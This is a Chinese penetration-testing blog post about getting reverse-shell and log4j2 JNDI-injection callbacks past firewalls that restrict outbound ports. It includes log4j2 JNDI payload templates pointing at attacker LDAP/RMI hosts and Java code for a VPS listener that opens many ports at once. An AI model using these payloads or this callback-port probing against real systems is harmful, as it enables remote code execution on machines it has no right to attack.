0x01 需求场景

在很多次攻防实战或者SRC挖掘过程中，碰到RCE想要反弹shell或者jndi注入时，只有dnslog会产生有效回连，自行nc监听的端口却毫无反应，这就可能遇到了目标防火墙限制出网端口的场景。dnslog是不限制出网端口的，所以不在本文的讨论范围之内，另外本文也不涉及讨论高版本JDK限制JNDI注入remote codebase的场景。书归正传，比如目标只限制80端口出网，但你nc监听的是80以外的端口（例如8080），那么这种情况下，反弹shell自然不可能成功。大部分人的解决方案是尝试使用 nc -vlp 常见端口号的方式进行尝试，例如80、443等。但是很多目标这些常见端口都不一定可以网络放行，基于这种情况下，可能判定目标机器不出网从而错失RCE的机会。

0x02 场景举例

就拿最近爆火的log4j2的RCE进行举例。
base payload大概是这样的

${jndi:ldap://dnslog地址:端口号/expclass}

由于ldap和rmi协议默认的端口号分别是1389和1099，所以大部分人的payload均为如下这样

${jndi:ldap://dnslog地址:1389/expclass}
${jndi:rmi://dnslog地址:1099/expclass}

但实际上很多企业的防火墙都会设置出网规则，只允许特定端口出网，尤其是一些云厂商就更为明确，因为其提供了防火墙面板

企业可以更为方便的控制出入站规则。
上图为阿里云防火墙默认的出入站规则，可以看出为22、80、443等端口，并不包含1389、1099等端口。如果使用1389、1099等端口监听ldap、rmi服务，显而易见的可以得出不可能攻击成功的结论。
黑盒测试时不可能知道目标机器的防火墙规则，那么只得使用nc -lvp port在vps开启端口监听，配合burpsuite的repeater模块不停的尝试，每换一个端口就需要ctrl+c终止一下nc进程，再换下一个，简直是累得不要不要的。可能有人想问，nc难道不支持监听多个端口或者全端口吗？其实不少人问过这个问题，然而其实不支持。

想了想为了解决这个痛点问题，于是我使用java多线程写了一个可以同时开启多个端口的工具，哪一个端口产生了回连就打印一下日志。

0x03 核心实现

考虑到探测端口时，可能有两种需求场景。
第一种为大部分人的想法，我预判一些常见的出网端口，比如53、80、443、1521、3306等端口，工具也必须支持同时开启你预判的这些端口。
第二种需求，你使用了常见例如80、443等端口，依然没有产生有效回连，那么只能设置端口号的区间段了，比如8000-9000、50000-55000这些区间，观察日志打印，从而判断哪些端口可以出网。
java监听端口的核心代码为下文

InetAddress address = InetAddress.getByAddress(new byte[]{0,0,0,0});
  ServerSocket serverSocket = new ServerSocket((Integer) port,backlog,address);

这里的address为你需要监听的地址，由于某些VPS的奇特环境，如果你不主动添加监听地址，很可能会得到一个监听ip为127.0.0.1的监听实例。为了严谨性需要配合Java多线程去实现，一个线程专门用来监听一个端口号，考虑到VPS性能关系不建议同时开启监听2000以上的端口。贴一下完整的核心代码参考https://www.codeleading.com/article/22205653148/

package test0531;

import java.io.InputStream;
import java.net.ServerSocket;
import java.net.Socket;
import java.util.Arrays;
import java.util.List;

/**
 * @author zhongzhilong
 * @date 2021/5/31
 * @description 服务端同时监听多个端口
 */
public class ListenMorePortSocketServer {
    /**
     * 同时监听9088,9089端口
     */
    private final List<Integer> portList = Arrays.asList(9088, 9089);

    /**
     * 具体的业务逻辑
     */
    public void run() {
        for (Integer port : portList) {
            new Thread(new Runnable() {
                @Override
                public void run() {
                    try {
                        ServerSocket serverSocket = new ServerSocket(port);
                        System.out.println("服务端开始监听端口：" + port);
                        // 持续监听端口
                        while (true) {
                            // 阻塞直接监听到端口请求
                            Socket socket = serverSocket.accept();
                            socket.setKeepAlive(true);
                            int localPort = socket.getLocalPort();
                            System.out.println("当前请求服务器的端口号为：" + localPort);
                            while (!socket.isClosed()) {
                                InputStream is = socket.getInputStream();
                                byte[] bytes = new byte[1024];
                                is.read(bytes);
                                String msg = new String(bytes, "utf-8");
                                System.out.println("我是服务端,端口号为：" + localPort + "的客户端说：" + msg);
                            }
                            // socket.shutdownInput();
                            // is.close();
                            // socket.close();
                        }
                    } catch (Exception e) {
                        e.printStackTrace();
                    }
                }
            }).start();
        }
    }
}

0x04 工具化实现

最终实现的效果如下
启动页

模式一：预判出网端口

模式二：端口区间模式

也支持占用端口的检测，防止错过任何一个RCE的机会

0x05 参考

socket服务端同时监听多个端口号:https://www.codeleading.com/article/22205653148/
成品工具：请参考【漏洞百出】https://public.zsxq.com/groups/555848225184.html